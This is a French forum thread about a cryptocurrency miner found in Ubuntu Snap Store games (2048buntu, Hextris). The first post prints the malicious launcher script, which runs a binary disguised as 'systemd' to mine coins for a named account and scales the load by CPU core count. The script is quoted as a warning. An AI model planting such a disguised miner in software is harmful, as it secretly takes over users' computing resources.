Discussions et informations sur ce qui se passe dans le monde de l'informatique.
Répondre

Malware trouvé dans l'Ubuntu Snap Store

#1Messageil y a 5 ans

En fait, un bitcoin miner. Le coupable qui se fait appeler Nicolas Tomb a été viré du store. Les logiciels infectés étaient à première vue les jeux 2048buntu and Hextris.
At least two of the snap packages, 2048buntu and Hextris, uploaded to the Ubuntu Snaps Store by user Nicolas Tomb, contained malware. All packages by Nicolas have since been removed from the Ubuntu Snaps Store, "pending further investigations".
Source: https://www.linuxuprising.com/2018/05/m ... store.html

Cependant, une simple recherche va vous donner d'innombrable échos de ce problème grave. Une chose est certaine, regardez-y à 2 fois avant d'installer un Snap (installable aussi sur Manjaro puisque universel). Je pense aussi qu'il faut se méfier de tout, et peut-être (?) aussi des packages Appimage. Je viens juste d'en installer un et pas des moindres puisqu'il s'agit de Wire Desktop (Messagerie). Il s'agit généralement d'applications dites "portables" donc très faciles à supprimer. Pour Wire, je ne m'inquiète pas trop vu que ça n'est pas leur intérêt de faire des c... (ils ont aussi des plans "Pro")

Bon, je pense que pour sa first Ferrari, ça va être reporté à une date ultérieure :lol:

Voici la partie du script en accusation:

#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

Lien: recherche sur ce thème: https://www.google.com/search?client=op ... 8&oe=UTF-8
Dernière modification par Nettlebayil y a 5 ans, modifié au total 1 fois.

Malware trouvé dans l'Ubuntu Snap Store

#2Messageil y a 5 ans

:salut: Touche pas à mon proc ! :mrgreen: Le minage de crypto-monnaies rapporte beaucoup d'argent aux petits malins. il faudra donc, dorénavant, se protéger contre ce nouveau fléau.

Malware trouvé dans l'Ubuntu Snap Store

#3Messageil y a 5 ans

:salut:

Appimages est plutôt axé sur des applis fournies par les développeurs et non des tierces personnes, c'est bien moins risqué.

Ce qui est marrant avec ce script, c'est que le gars n'a rien fait pour être discret, sytemd pour le script de minage, currency pour la variable et mapremièreferrari pour l'adresse mail. :gsourire:

Le minage n'a rien de négatif à partir du moment où c'est une démarche volontaire, comme par exemple miner pour un site plutôt que faire un don en espèce.

Malware trouvé dans l'Ubuntu Snap Store

#4Messageil y a 5 ans

Et de l'humour... (ou de la provoc!)
Où un lanceur d'alertes (en quelque sorte) pour montrer que les utilisateurs installent n'importe quoi sans vérifier...
Répondre